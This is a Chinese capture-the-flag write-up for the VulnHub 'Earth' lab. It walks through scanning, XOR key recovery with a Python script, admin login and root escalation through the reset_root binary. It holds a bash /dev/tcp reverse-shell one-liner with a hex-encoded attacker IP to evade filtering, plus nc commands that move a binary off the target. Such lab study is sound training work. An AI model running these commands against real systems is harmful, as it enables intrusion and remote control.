• VulnHub Earth


    一、信息收集

    1.主机和端口扫描

    nmap -sS 192.168.103.1/24

    发现443端口有DNS解析,在hosts文件中添加DNS解析:

    2.收集earth.local信息

    发现有Previous Messages

    37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40 3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45 2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a

    接下来扫描一下目录:

    利用dirb扫描目录

    3.收集terratest.earth.local信息

    扫描一下目录:

    发现有robots.txt文件,查看一下:

    发现有个testingnotes文件,但是不知道是图中的哪种格式,手动测试后发现是txt格式,访问testingnotes.txt

    1. test encryption.
    2. *terra used as username for admin portal.
    3. Todo:
    4. *How do we send our monthly keys to Earth securely? Or should we change keys weekly?
    5. *Need to test different key lengths to protect against bruteforce. How long should the key be?
    6. *Need to improve the interface of the messaging interface and the admin panel, it's currently very basic.
    7. 测试安全消息系统注意事项:
    8. *使用XOR加密作为算法,应该和RSA中使用的一样安全。
    9. *地球已确认已收到我们发送的消息。
    10. *testdata.txt 用于测试加密。
    11. *terra 用作管理门户的用户名。
    12. 去做:
    13. *我们如何安全地将每月的密钥发送到地球?或者我们应该每周更换一次钥匙?
    14. *需要测试不同的密钥长度以防止暴力破解。钥匙应该多长?
    15. *需要改进消息界面和管理面板的界面,目前还很基础。

    二、漏洞攻击

    1.破解密码

    写个简单py脚本,选一个Previous Messages数据,然后与 testdata.txt 进行一下 XOR 运算,得到密钥

    1. import binascii
    2. data1 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"
    3. f = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()
    4. print(hex(int(data1,16) ^ int(f,16)))

    运行后得到以下数据:

    0x6561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174

    十六进制转文本解码一下:

    密码是重复的,然后使用用户名 terra ,密码:earthclimatechangebad4humans 登录 https://earth.local/admin

    2.user_flag

    ls
    find / -name "*flag*"  #使用find命令查找flag
    cat /var/earth_web/user_flag.txt  #拿到user_flag
    user_flag_3353b67d6437f07ba7d34afd7d2fc27d

    3.使用反弹shell连接到靶机

    把IP地址进行16进制转换,过滤

    ##4444端口
    nc -lvp 4444
    #攻击机IP
    bash -i >& /dev/tcp/0xc0.0xa8.0x67.0x81/4444 0>&1

    三、提权

    查找有权限的命令:

    find / -perm -u=s -type f 2>/dev/null

    运行一下reset_root:

    发现报错:

    CHECKING IF RESET TRIGGERS PRESENT...RESET FAILED, ALL TRIGGERS ARE NOT PRESENT.

    检查是否存在重置触发器...重置失败,所有触发器都不存在。

    本地没有调试的命令,使用nc传送到本地调试一下

    ##kali运行

    nc -lvp 4444 >reset_root

    ##靶机运行

    nc 192.168.103.129 4444 < /usr/bin/reset_root

    使用 strace 命令进行调试

    因为没有以下三个文件而报错,查看靶机发现也没有这三个文件:

    1. access("/dev/shm/kHgTFI5G", F_OK) = -1 ENOENT (没有那个文件或目录)
    2. access("/dev/shm/Zw7bV9U5", F_OK) = -1 ENOENT (没有那个文件或目录)
    3. access("/tmp/kcM0Wewe", F_OK) = -1 ENOENT (没有那个文件或目录)

    在靶机中创建这三个文件:

    登录root用户

    然后再靶机中尝试运行reset_root:

    root_flag

    取得root权限,查找flag:

    root_flag_b0da9554d29db2117b02aa8b66ec492e

  • 相关阅读:
    32.Python面向对象(五)【描述符、运算符底层、装饰器:闭包-闭包参数-内置装饰器-类装饰器】
    MySQL 5.7.31详细下载安装配置
    UVA 294 约数 Divisors
    6.28 学习内容
    【剑指Offer】11-15题(二分+DFS+BFS+DP+简单位运算)
    MybatisX插件 逆向工程
    Games101
    Java提高与实践
    ConfigMap概述
    RTP GB28181 文件测试工具
  • 原文地址:https://blog.csdn.net/SENMINGya/article/details/133611616